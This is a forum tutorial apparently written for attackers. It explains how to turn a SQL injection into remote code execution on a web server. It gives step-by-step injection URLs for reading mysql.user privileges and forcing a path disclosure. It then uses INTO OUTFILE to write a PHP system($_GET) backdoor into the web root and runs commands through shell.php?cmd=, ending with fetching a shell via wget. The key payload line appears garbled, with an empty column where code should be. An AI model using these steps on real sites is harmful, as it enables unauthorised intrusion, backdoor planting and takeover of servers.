What is the use of this ?
Have you ever injected some database , And never found the administrator control panel url ? YES , So apparentely you don’t have any chance of uploading your php backdoor(shell) , NO , You still have a chance by useing INTO() , OUTFILE() SQL commands , And with a little help of system(); , You will be able to read files from the server as a string , And also upload files to the webserver remotely .
Shall we start ?
Requirements :
1- A php backdoor(shell) – .txt
2- Basic knowledge with Structure Query Language (SQL).
So let’s say that you’ve injected a website , And no admin login page , This is your current query :
www.site.com/index.php?id=-1+union+select+1,2,3--
Now you’ll see the vulnerable columns count that is vulnerable to be injected into .
In my case it showed out that “2” Is the vulnerable column so that I’ll be injecting into it like this
www.site.com/index.php?id=-1+union+select+1,user,3+from+mysql.user--
If you get an error while doing this , Then you can’t use this method as you’re not privileged to read/write into the table ” mysql.user ”
Now If there’s no errors on the page , Then you can see the mysql.user name printed out on the webpage ..
somename
Now we need to check if the user has privileges to read/write/access/execute or not , In my case I’ll be doing this :
http://www.site.com/index.php?id=-1+union+select+1,group_concat(user,0x3a,file_priv),3from+mysql.user--
Now it should fetch all the users and their privileges.
It will look like this :
root:Y,root:Y,apache:N,somename_somename:Y
Okay so our username is “somename” now we are capable of editing/writing stuff on the webserver , To spawn a file into the webserver we will need to fetch out the source path disclosure , and to do this , You’ll need to cause an error to the webpage Hopefully The error will appear , And to cause this error you’ll try some thing like this .
www.site.com/index.php?id[]=-1
Now if it did work , You’ll get something like that
/var/www/vhost/username/data/www/sitename/
Now you gotta find a writable/accessible directory on the webserver , Usually “public_html” is writable , If not just surf abit to find some directory and try writing into it .
Now the system(); function comes in hand , We need to write/spawn some file ( phpbackdoor (shell) ) into the directory , Like this
www.index.com/index.php?id=-1+union+select+null,,null INTO OUTFILE /var/www/vhost/username/data/www/sitename/shell.php
Now we had to change our column names from valid strings into Nulls , Note : Nulls in SQL never means 0 , Then we replaced our vulnerable column with the famous system(); function that has a $_GET function That will allow us some Remote code execution to the Full path written at the end .
After running that , Our shell should be spawned successfuly , Now we got to see if it was spawned successfuly
www.site.com/shell.php
Now we should see some PHP error that got parsed , But Don’t worry that’s pretty normal , To get the Remote code execution to the server , We will do this :
shell.php?cmd=your command in here
And baam you should now be able to spawn your shell useing the wget() function .
This is all about it , Thanks for reading my thread ,
Greetings .
38.987680
-77.508992